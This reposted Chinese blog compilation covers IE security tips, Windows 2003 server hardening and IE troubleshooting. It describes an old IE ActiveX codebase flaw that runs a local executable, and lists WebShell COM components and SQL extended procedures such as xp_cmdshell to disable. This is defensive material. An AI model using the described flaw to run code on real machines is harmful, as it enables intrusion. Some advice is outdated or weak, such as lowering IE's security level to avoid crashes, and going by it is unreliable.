在網頁中經常使用Java、Java Applet、ActiveX編寫的腳本,它們可能會獲取你的用戶標識、IP地址,乃至口令,甚至會在你的機器上安裝某些程序或進行其他操作,因此應對 Java、Java小程序腳本、ActiveX控件和插件的使用進行限制。打開“Internet選項”→“安全”→“自定義級別”,就可以設置 “ActiveX控件和插件”、“Java”、“腳本”、“下載”、“用戶驗證”以及其它安全選項。對于一些不太安全的控件或插件以及下載操作,應該予以 禁止、限制,至少要進行提示。
3.防止泄露自己的信息
缺省條件下,用戶在第一次使用Web地址、表單、表單的用戶名和密碼后,同意保存密碼,在下一次再進入同樣的Web頁及輸入密碼時,只需輸入開頭部 分,后面的就會自動完成,給用戶帶來了方便,但同時也留下了安全隱患,不過我們可以通過調整“自動完成”功能的設置來解決。設置方法如下:依次點擊 “Internet選項”→“內容”→“自動完成”,打開“自動完成設置”對話框,選中要使用的“自動完成”復選項。
提醒:為發安全起見,防止泄露自己的一些信息,應該定期清除歷史記錄,方法是在“自動完成設置”對話框中點擊“清除表單”和“清除密碼”按鈕。
4.清除已瀏覽過的網址
在“Internet選項”對話框中的“常規”標簽下單擊歷史記錄區域的“清除歷史記錄”按鈕即可。若只想清除部分記錄,單擊IE工具欄上的“歷史”按鈕,在左欄的地址歷史記錄中,找到希望清除的地址或其下網頁,單擊鼠標右鍵,從彈出的快捷菜單中選取“刪除”。
5.清除已訪問過的網頁
為了加快瀏覽速度,IE會自動把你瀏覽過的網頁保存在緩存文件夾“C:/Windows/Temporary Internet Files”下。當你確認不再需要瀏覽過的網頁時,在此選中所有網頁,刪除即可。或者在“Internet選項”的“常規”標簽下單擊“Internet 臨時文件”項目中的“刪除文件”按鈕,在打開的“刪除文件”對話框中選中“刪除所有脫機內容”,單擊“確定”,這種方法會遺留少許Cookie在文件夾 內,為此IE6.0在“刪除文件”按鈕旁邊增加了一個“刪除Cookie”的按鈕,通過它可以很方便地刪除遺留的。
6.永遠不怕IE主頁地址被修改
眾所周知,修改IE默認主頁地址是惡意網頁常用的一招。IE被修改后,會自動連接到惡意網頁的地址。大家常用的方法是修改注冊表,其實,只要簡單給IE加個參數,就再也不害怕主頁地址被修改了。下面是具體的方法和步驟。
首先,打開“我的電腦”,找到IE的安裝目錄,這里假設你的IE安裝在C:Program FilesInternet Explorer下。進入該文件夾,找到Iexplore.exe文件,對著它點擊鼠標右鍵,在彈出的快捷菜單中選擇“發送到→桌面快捷方式”,這樣就在 桌面上建立了一個Iexplore.exe文件的快捷方式。如果你夠仔細的話,你會發現你建立的這個快捷方式名字為“Iexplore.exe”,而桌面 上原來的IE快捷方式名字為“Internet Explorer”,兩者不僅名字不相同,而且“內涵”也不盡相同。
繼續我們的工作,用鼠標右鍵單擊該快捷方式,選擇“屬性”,會彈出“Iexplore.exe 屬性”對話框,選擇其中的“快捷方式”標簽,然后在“目標”框里填入:"C:Program FilesInternet ExplorerIEXPLORE.EXE" -nohome,給Iexplore.exe加上參數“-nohome”,輸入時請大家注意在參數“-nohome”前面有一個空格,不要忘了,輸入完 畢。點擊“確定”退出即可。
這樣即使主頁被修改也沒有關系,打開IE就是一片空白,就連about:blank也不顯示。而且這樣能夠加快啟動速度,一點IE窗口馬上就出蹦來了。
對于IE在安裝時自己建立的快捷方式,我們無法為它加上上述參數。如果不信可以試試,用鼠標右鍵點擊桌面上原來IE自建的快捷方式,選“屬性”,會發 現“目標”欄、“起始位置”欄、“快捷鍵”欄和“運行方式”欄都是灰色不可選取狀態。這就是它們之間最大的不同!也是本文的關鍵所在。
7.挖出IE本地安全配置選項
在IE中可以通過點擊“工具→Internet選項→安全”來設定電腦安全等級,之后會出現。從圖中可以看出,在安全性設定中我們只能設定 Internet、本地Intranet、受信任的站點、受限制的站點。不過,慣于隱藏其部分功能的微軟(真不知微軟是怎么想的,老和我們玩“捉迷藏”游 戲),在這里又留了一手:其實這里還有一個隱藏的選項??就是“我的電腦”的安全性設定,如果你想看到它,可以通過修改注冊表的方法來達到目的。
下面是具體的方法:打開“開始”菜單中的“運行”,在彈出的“運行”對話框中輸入Regedit.exe,打開注冊表編輯器,點擊前面的“+”號順次 展開到:HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones,在右邊窗口中找到DWORD值“Flags”,默認鍵值為十六進制的21(十進制33),雙擊“Flags”,在彈出的對話 框中將它的鍵值改為“1”即可,關閉注冊表編輯器。無需重新啟動電腦,重新打開IE,再次點擊“工具→Internet選項→安全”標簽,你就會看到多了 一個“我的電腦”,在這里你可以對IE的本地安全進行配置。
這個小技巧有什么用呢?把下面的代碼保存為一個html文件,然后運行試試就知道了:
運行上面的html文件,會打開你的計算機中c:/winnt/system32文件夾下的calc.exe文件!而且IE沒有任何提示!即使在IE 的安全設置中禁用ActiveX控件上述代碼也能工作!如果不是calc.exe文件而是其他惡意文件又會怎么樣?如果是在你瀏覽的網頁中含有類似上面的 代碼又會怎么樣?真危險啊!
之所以會這樣是由于IE存在兩個可怕的漏洞:可本地執行任意命令,IE的ActiveX安全設置可被繞過。在上述代碼中我們給IE指定了一個系統中并 不存在的控件號("clsid:88888888-8888-8888-8888-888888888888),IE會試圖從codebase指定的地址 去下載并安裝改控件。根據codebase于是IE找到了c:/winnt/system32/calc.exe,接著IE開始“下載”并安裝該程序。由 于calc.exe是EXE文件,這樣就等于是在運行該文件,所以calc.exe就被運行了!
那么為什么IE在“下載安裝控件”過程中不提示用戶,也不應用IE安全設置中的限定進行檢測呢?這就是IE的ActiveX安全設置可被繞過漏洞造成 的!其主要原因是IE安全設置都是針對非本地的頁面或交互的,對于本地的安全設置IE是最大信任的。如果你注意看IE的安全設置,都是對Internet 和Intranet上WEB服務器而言的,根本就沒有對本地文件的安全設置。概括說來就是IE對本地安全采用最大信任原則。
解決的辦法就是我們在開始說的那個技巧:挖出挖出IE本地安全配置選項,即修改IE安全設置中有關“我的電腦”的設置,選定后,禁用ActiveX下載就萬事大吉了。
8.在DOS下打開“Internet屬性”窗口
有時在瀏覽了某些惡意網頁后,會導致IE的“Internet屬性”對話框無法打開,這時我們可以在DOS窗口下輸入:RunDll32.exe shell32.dll,Control_RunDLL inetcpl.cpl命令,就可打開IE的“Internet屬性”對話框。要注意“Control_RunDLL”的大小寫以及它前面的逗號(,)不 要忘記了。RunDll32.exe是Windows動態鏈接庫(DLL)管理工具,可以用來在命令行下執行動態鏈接庫中的某個函數(或者功能模塊)。
RunDll32的使用方法如下:RunDll32.EXE , ,要注意以下幾點:
①Dllname(就是制定DLL動態鏈接庫所在位置和文件名)直接不能有空格;
②Dllname和entrypoint兩者之間只能以“,”(逗號)分隔,逗號之后不能有空格,如果這里出錯的話,你不會得到任何提示;
③optional arguments動態鏈接庫調用參數,這個參數對大小寫是很敏感的,注意不要寫錯。
9.解除IE的分級審查口令
有些時候,我們的IE會被人修改為設有分級審查口令,一旦被設置了分級審查口令,即使重新安裝IE也是沒有用的。怎么辦呢?難道要格式化硬盤?千萬不要!這里我有一個好辦法,幫您解決這個問題。
進入注冊表,找到 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionpoliciesRatings, 這里有一個名為“key”的主鍵,這就是您設置的分級審查口令,直接將它刪除即可。重新啟動之后,點擊“工具”→“Internet選項”→“內容”→ “分級審查”,您會發現分級審查口令已經被復位了。現在您只要輸入新的分級審查口令即可。
如果你用的是Windows 9x則更簡單了,到C:Windowssystem目錄里找到rating.pol文件,要注意這是一個隱藏文件,直接將它刪除就可以解決問題了。
10. 預防網頁惡意代碼
許多惡意網頁為防止有人查看其代碼內容,采取了各種各樣的方法求防止我們查看其源代碼。然而,他們的一切努力也許都是白費心機。因為用如下的方法可以 輕易地查看其源代碼。只要在IE地址欄中輸入View-Source:URL即可。舉個例子,你想查看某網站 http://yixiao.unibbs.net 的源代碼,只要在IE地址欄中輸入:View-Source http://yixiao.unibbs.net,稍等一下就會彈出一個窗口,里面就是你想看到的網頁源代碼。趕快仔細看看,里面是否有更改注冊表或暗 中下載文件的惡意代碼,如果有那就別進該網頁了,很簡單吧?這樣做不僅可以學到別人的網頁制作技術,更可以事先預防惡意代碼,一舉兩得~
Windows Internet服務器安全配置
--------------------------------------------------------------------------------
原理篇
我們將從入侵者入侵的各個環節來作出對應措施一步步的加固windows系統.一共歸于幾個方面
1.端口限制
2.設置ACL權限
3.關閉服務或組件
4.包過濾
5.審計
我們現在開始從入侵者的第一步開始.對應的開始加固已有的windows系統.
1.掃描
這是入侵者在剛開始要做的第一步.比如搜索有漏洞的服務.
對應措施:端口限制
以下所有規則.都需要選擇鏡像,否則會導致無法連接
我們需要作的就是打開服務所需要的端口.而將其他的端口一律屏蔽
2.下載信息
這里主要是通過URL SCAN.來過濾一些非法請求
對應措施:過濾相應包
我們通過安全URL SCAN并且設置urlscan.ini中的DenyExtensions字段
來阻止特定結尾的文件的執行
3.上傳文件
入侵者通過這步上傳WEBSHELL,提權軟件,運行cmd指令等等.
對應措施:取消相應服務和功能,設置ACL權限
如果有條件可以不使用FSO的.
通過 regsvr32 /u c:\windows\system32\scrrun.dll來注銷掉相關的DLL.
如果需要使用.
那就為每個站點建立一個user用戶
對每個站點相應的目錄.只給這個用戶讀,寫,執行權限,給administrators全部權限
安裝殺毒軟件.實時殺除上傳上來的惡意代碼.
個人推薦MCAFEE或者卡巴斯基
如果使用MCAFEE.對WINDOWS目錄所有添加與修改文件的行為進行阻止.
4.WebShell
入侵者上傳文件后.需要利用WebShell來執行可執行程序.或者利用WebShell進行更加方便的文件操作.
對應措施:取消相應服務和功能
一般WebShell用到以下組件
WScript.Network
WScript.Network.1
WScript.Shell
WScript.Shell.1
Shell.Application
Shell.Application.1
我們在注冊表中將以上鍵值改名或刪除
同時需要注意按照這些鍵值下的CLSID鍵的內容
從/HKEY_CLASSES_ROOT/CLSID下面對應的鍵值刪除
5.執行SHELL
入侵者獲得shell來執行更多指令
對應措施:設置ACL權限
windows的命令行控制臺位于\WINDOWS\SYSTEM32\CMD.EXE
我們將此文件的ACL修改為
某個特定管理員帳戶(比如administrator)擁有全部權限.
其他用戶.包括system用戶,administrators組等等.一律無權限訪問此文件.
6.利用已有用戶或添加用戶
入侵者通過利用修改已有用戶或者添加windows正式用戶.向獲取管理員權限邁進
對應措施:設置ACL權限.修改用戶
將除管理員外所有用戶的終端訪問權限去掉.
限制CMD.EXE的訪問權限.
限制SQL SERVER內的XP_CMDSHELL
7.登陸圖形終端
入侵者登陸TERMINAL SERVER或者RADMIN等等圖形終端,
獲取許多圖形程序的運行權限.由于WINDOWS系統下絕大部分應用程序都是GUI的.
所以這步是每個入侵WINDOWS的入侵者都希望獲得的
對應措施:端口限制
入侵者可能利用3389或者其他的木馬之類的獲取對于圖形界面的訪問.
我們在第一步的端口限制中.對所有從內到外的訪問一律屏蔽也就是為了防止反彈木馬.
所以在端口限制中.由本地訪問外部網絡的端口越少越好.
如果不是作為MAIL SERVER.可以不用加任何由內向外的端口.
阻斷所有的反彈木馬.
8.擦除腳印
入侵者在獲得了一臺機器的完全管理員權限后
就是擦除腳印來隱藏自身.
對應措施:審計
首先我們要確定在windows日志中打開足夠的審計項目.
如果審計項目不足.入侵者甚至都無需去刪除windows事件.
其次我們可以用自己的cmd.exe以及net.exe來替換系統自帶的.
將運行的指令保存下來.了解入侵者的行動.
對于windows日志
我們可以通過將日志發送到遠程日志服務器的方式來保證記錄的完整性.
evtsys工具(https://engineering.purdue.edu/ECN/Resources/Documents)
提供將windows日志轉換成syslog格式并且發送到遠程服務器上的功能.
使用此用具.并且在遠程服務器上開放syslogd,如果遠程服務器是windows系統.
推薦使用kiwi syslog deamon.
我們要達到的目的就是
不讓入侵者掃描到主機弱點
即使掃描到了也不能上傳文件
即使上傳文件了不能操作其他目錄的文件
即使操作了其他目錄的文件也不能執行shell
即使執行了shell也不能添加用戶
即使添加用戶了也不能登陸圖形終端
即使登陸了圖形終端.擁有系統控制權.他的所作所為還是會被記錄下來.
額外措施:
我們可以通過增加一些設備和措施來進一步加強系統安全性.
1.代理型防火墻.如ISA2004
代理型防火墻可以對進出的包進行內容過濾.
設置對HTTP REQUEST內的request string或者form內容進行過濾
將SELECT.DROP.DELETE.INSERT等都過濾掉.
因為這些關鍵詞在客戶提交的表單或者內容中是不可能出現的.
過濾了以后可以說從根本杜絕了SQL 注入
2.用SNORT建立IDS
用另一臺服務器建立個SNORT.
對于所有進出服務器的包都進行分析和記錄
特別是FTP上傳的指令以及HTTP對ASP文件的請求
可以特別關注一下.
本文提到的部分軟件在提供下載的RAR中包含
包括COM命令行執行記錄
URLSCAN 2.5以及配置好的配置文件
IPSEC導出的端口規則
evtsys
一些注冊表加固的注冊表項.
實踐篇
下面我用的例子.將是一臺標準的虛擬主機.
系統:windows2003
服務:[IIS] [SERV-U] [IMAIL] [SQL SERVER 2000] [PHP] [MYSQL]
描述:為了演示,綁定了最多的服務.大家可以根據實際情況做篩減
1.WINDOWS本地安全策略 端口限制
A.對于我們的例子來說.需要開通以下端口
外->本地 80
外->本地 20
外->本地 21
外->本地 PASV所用到的一些端口
外->本地 25
外->本地 110
外->本地 3389
然后按照具體情況.打開SQL SERVER和MYSQL的端口
外->本地 1433
外->本地 3306
B.接著是開放從內部往外需要開放的端口
按照實際情況,如果無需郵件服務,則不要打開以下兩條規則
本地->外 53 TCP,UDP
本地->外 25
按照具體情況.如果無需在服務器上訪問網頁.盡量不要開以下端口
本地->外 80
C.除了明確允許的一律阻止.這個是安全規則的關鍵.
外->本地 所有協議 阻止
2.用戶帳號
a.將administrator改名,例子中改為root
b.取消所有除管理員root外所有用戶屬性中的
遠程控制->啟用遠程控制 以及
終端服務配置文件->允許登陸到終端服務器
c.將guest改名為administrator并且修改密碼
d.除了管理員root,IUSER以及IWAM以及ASPNET用戶外.禁用其他一切用戶.包括SQL DEBUG以及TERMINAL USER等等
3.目錄權限
將所有盤符的權限,全部改為只有
administrators組 全部權限
system 全部權限
將C盤的所有子目錄和子文件繼承C盤的administrator(組或用戶)和SYSTEM所有權限的兩個權限
然后做如下修改
C:\Program Files\Common Files 開放Everyone 默認的讀取及運行 列出文件目錄 讀取三個權限
C:\WINDOWS\ 開放Everyone 默認的讀取及運行 列出文件目錄 讀取三個權限
C:\WINDOWS\Temp 開放Everyone 修改,讀取及運行,列出文件目錄,讀取,寫入權限
現在WebShell就無法在系統目錄內寫入文件了.
當然也可以使用更嚴格的權限.
在WINDOWS下分別目錄設置權限.
可是比較復雜.效果也并不明顯.
4.IIS
在IIS 6下.應用程序擴展內的文件類型對應ISAPI的類型已經去掉了IDQ,PRINT等等危險的腳本類型,
在IIS 5下我們需要把除了ASP以及ASA以外所有類型刪除.
安裝URLSCAN
在[DenyExtensions]中
一般加入以下內容
.cer
.cdx
.mdb
.bat
.cmd
.com
.htw
.ida
.idq
.htr
.idc
.shtm
.shtml
.stm
.printer
這樣入侵者就無法下載.mdb數據庫.這種方法比外面一些在文件頭加入特殊字符的方法更加徹底.
因為即便文件頭加入特殊字符.還是可以通過編碼構造出來的
5.WEB目錄權限
作為虛擬主機.會有許多獨立客戶
比較保險的做法就是為每個客戶,建立一個windows用戶
然后在IIS的響應的站點項內
把IIS執行的匿名用戶.綁定成這個用戶
并且把他指向的目錄
權限變更為
administrators 全部權限
system 全部權限
單獨建立的用戶(或者IUSER) 選擇高級->打開除 完全控制,遍歷文件夾/運行程序,取得所有權 3個外的其他權限.
如果服務器上站點不多.并且有論壇
我們可以把每個論壇的上傳目錄
去掉此用戶的執行權限.
只有讀寫權限
這樣入侵者即便繞過論壇文件類型檢測上傳了webshell
也是無法運行的.
6.MS SQL SERVER2000
使用系統帳戶登陸查詢分析器
運行以下腳本
use master
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_dropextendedproc 'xp_dirtree'
exec sp_dropextendedproc 'xp_enumgroups'
exec sp_dropextendedproc 'xp_fixeddrives'
exec sp_dropextendedproc 'xp_loginconfig'
exec sp_dropextendedproc 'xp_enumerrorlogs'
exec sp_dropextendedproc 'xp_getfiledetails'
exec sp_dropextendedproc 'Sp_OACreate'
exec sp_dropextendedproc 'Sp_OADestroy'
exec sp_dropextendedproc 'Sp_OAGetErrorInfo'
exec sp_dropextendedproc 'Sp_OAGetProperty'
exec sp_dropextendedproc 'Sp_OAMethod'
exec sp_dropextendedproc 'Sp_OASetProperty'
exec sp_dropextendedproc 'Sp_OAStop'
exec sp_dropextendedproc 'Xp_regaddmultistring'
exec sp_dropextendedproc 'Xp_regdeletekey'
exec sp_dropextendedproc 'Xp_regdeletevalue'
exec sp_dropextendedproc 'Xp_regenumvalues'
exec sp_dropextendedproc 'Xp_regread'
exec sp_dropextendedproc 'Xp_regremovemultistring'
exec sp_dropextendedproc 'Xp_regwrite'
drop procedure sp_makewebtask
go
刪除所有危險的擴展.
7.修改CMD.EXE以及NET.EXE權限
將兩個文件的權限.修改到特定管理員才能訪問,比如本例中.我們如下修改
cmd.exe root用戶 所有權限
net.exe root用戶 所有權現
這樣就能防止非法訪問.
還可以使用例子中提供的comlog程序
將com.exe改名_com.exe,然后替換com文件.這樣可以記錄所有執行的命令行指令
8.備份
使用ntbackup軟件.備份系統狀態.
使用reg.exe 備份系統關鍵數據
如reg export HKLM\SOFTWARE\ODBC e:\backup\system\odbc.reg /y
來備份系統的ODBC
9.殺毒
這里介紹MCAFEE 8i 中文企業版
因為這個版本對于國內的許多惡意代碼和木馬都能夠及時的更新.
比如已經能夠檢測到海陽頂端2006
而且能夠殺除IMAIL等SMTP軟件使用的隊列中MIME編碼的病毒文件
而很多人喜歡安裝諾頓企業版.而諾頓企業版,對于WEBSHELL.基本都是沒有反應的.
而且無法對于MIME編碼的文件進行殺毒.
在MCAFEE中.
我們還能夠加入規則.阻止在windows目錄建立和修改EXE.DLL文件等
我們在軟件中加入對WEB目錄的殺毒計劃.
每天執行一次
并且打開實時監控.
10.關閉無用的服務
我們一般關閉如下服務
Computer Browser
Help and Support
Messenger
Print Spooler
Remote Registry
TCP/IP NetBIOS Helper
如果服務器不用作域控,我們也可以禁用
Workstation
11.取消危險組件
如果服務器不需要FSO
regsvr32 /u c:\windows\system32\scrrun.dll
注銷組件
使用regedit
將/HKEY_CLASSES_ROOT下的
WScript.Network
WScript.Network.1
WScript.Shell
WScript.Shell.1
Shell.Application
Shell.Application.1
鍵值改名或刪除
將這些鍵值下CLSID中包含的字串
如{72C24DD5-D70A-438B-8A42-98424B88AFB8}
到/HKEY_CLASSES_ROOT/CLSID下找到以這些字串命名的鍵值
全部刪除
12.審計
本地安全策略->本地策略->審核策略
打開以下內容
審核策略更改 成功,失敗
審核系統事件 成功,失敗
審核帳戶登陸事件 成功,失敗
審核帳戶管理 成功,失敗
[補充]Windows IE 瀏覽器的故障整理
--------------------------------------------------------------------------------
1.發送錯誤報告
「故障現象」
在使用IE瀏覽網頁的過程中,出現“Microsoft Internet Explorer遇到問題需要關閉……”的信息提示。此時,如果單擊“發送錯誤報告”按鈕,則會創建錯誤報告,單擊“關閉”按鈕之后會引起當前IE窗口關 閉;如果單擊“不發送”按鈕,則會關閉所有IE窗口。
「故障點評」
這是IE為了解用戶在使用中的錯誤而設計的一個小程序,不過我可不想當微軟的“免費測試員”,更何況每天它都會面對成千上萬的報告,誰知道有沒有在意我的報告問題呢?
「故障解決」
針對不同情況,可分別用以下方法關閉IE發送錯誤報告功能:
①對IE 5.x用戶,執行“控制面板→添加或刪除程序”,在列表中選擇“Internet Explorer Error Reporting”選項,然后單擊“更改/刪除”按鈕,將其從系統中刪除。
②對Windows 9x/Me/NT/2000下的IE 6.0用戶,則可打開“注冊表編輯器”,找[HKEY_LOCAL_MACHINE\Software \Microsoft\Internet Explorer\Main],在右側窗格創建名為IEWatsonEnabled的DWORD雙字節值,并將其賦值為0.
③對Windows XP的IE 6.0用戶,執行“控制面板→系統”,切換到“高級”選項卡,單擊“錯誤報告”按鈕,選中“禁用錯誤報告”選項,并選中“但在發生嚴重錯誤時通知我”,最后單擊“確定”按鈕。
2.IE發生內部錯誤,窗口被關閉
「故障現象」
在使用IE瀏覽一些網頁時,出現錯誤提示對話框:“該程序執行了非法操作,即將關閉……”,單擊“確定”按鈕后又彈出一個對話框,提示“發生內部錯誤……”。單擊“確定”按鈕后,所有打開的IE窗口都被關閉。
「故障點評」
該錯誤產生原因多種多樣,內存資源占用過多、IE安全級別設置與瀏覽的網站不匹配、與其他軟件發生沖突、瀏覽網站本身含有錯誤代碼……這些情況都有可能,需要耐心加以解決。
「故障解決」
①關閉過多的IE窗口。如果在運行需占大量內存的程序,建議IE窗口打開數不要超過5個。
②降低IE安全級別。執行“工具→Internet選項”菜單,選擇“安全”選項卡,單擊“默認級別”按鈕,拖動滑塊降低默認的安全級別。
③將IE升級到最新版本。
IE 6.0下載地址: http://www.skycn.com/soft/4767.html.IE 6.0
SP1下載地址: http://download.microsoft.com .
可使用以IE為核心的瀏覽器,如MyIE2.它占用系統資源相對要少,而且當瀏覽器發生故障關閉時,下次啟動它,會有“是否打開上次發生錯誤時的頁面”的提示,盡可能地幫你挽回損失。
下載地址:http://soft.mumayi.net/Software/catalog12/2856.html
3.出現運行錯誤
「故障現象」
用IE瀏覽網頁時彈出“出現運行錯誤,是否糾正錯誤”對話框,單擊“否”按鈕后,可以繼續上網瀏覽。
「故障點評」
可能是所瀏覽網站本身的問題,也可能是由于IE對某些腳本不支持。
「故障解決」
①啟動IE,執行“工具→Internet選項”菜單,選擇“高級”選項卡,選中“禁止腳本調試”復選框,最后單擊“確定”按鈕即可。
②將IE瀏覽器升級到最新版本。
4.IE窗口始終最小化的問題
「故障現象」
每次打開的新窗口都是最小化窗口,即便單擊“最大化”按鈕后,下次啟動IE后新窗口仍舊是最小化的。
「故障點評」
IE具有“自動記憶功能”,它能保存上一次關閉窗口后的狀態參數,IE本身沒有提供相關設置選項,不過可以借助修改注冊表來實現。
「故障解決」
①打開“注冊表編輯器”,找到[HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas],然后選中窗口右側的“OldWorkAreaRects”,將其刪除。
②同樣在“注冊表編輯器”中找到[HKEY_CURRENT_USER\Software \Microsoft\Internet Explorer\Main],選擇窗口右側的“Window_Placement”,將其刪除。
③退出“注冊表編輯器”,重啟電腦,然后打開IE,將其窗口最大化,并單擊“往下還原”按鈕將窗口還原,接著再次單擊“最大化”按鈕,最后關閉IE窗口。以后重新打開IE時,窗口就正常了!
5.IE無法打開新窗口
「故障現象」
在瀏覽網頁過程中,單擊超級鏈接無任何反應。
「故障點評」
多半是因為IE新建窗口模塊被破壞所致。
「故障解決」
單擊“開始→運行”,依次運行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”將這兩個DLL文件注冊,然后重啟系統。如果還不行,則可以將mshtml.dll、urlmon.dll、 msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注冊一下。
6.脫機卻無法瀏覽本機上的網頁
「故障現象」
通過IE的“脫機瀏覽”功能,我們差不多能瀏覽所有已經下載到本地硬盤的網頁內容,這對撥號上網的用戶來說更是省錢的一d法寶。但有時,目標網頁雖融硬盤上,但是卻提示“無法瀏覽”。
「故障點評」
這多半是由于你修改了系統時間,引起了IE歷史記錄的錯亂。
「故障解決」
①可用直接在“臨時文件夾”中搜索的方法來激活它。按下Win+F,在“包含文字”處輸入部分記憶中的關鍵字,在“搜索”處按“瀏覽”按鈕選擇IE臨 時文件夾的地址,如“C:\WINDOWS\Temporary Internet Files”,單擊“開始查找”,在結果列表里雙擊目標頁打開。
②可以嘗試用騰訊的TE等瀏覽器來脫機瀏覽。
轉載于:https://www.cnblogs.com/riky/archive/2008/02/11/1066909.html
總結
- 上一篇: 如何使用小皮面板一键安装WordPres
- 下一篇: 如何将AI文件转换为PSD文件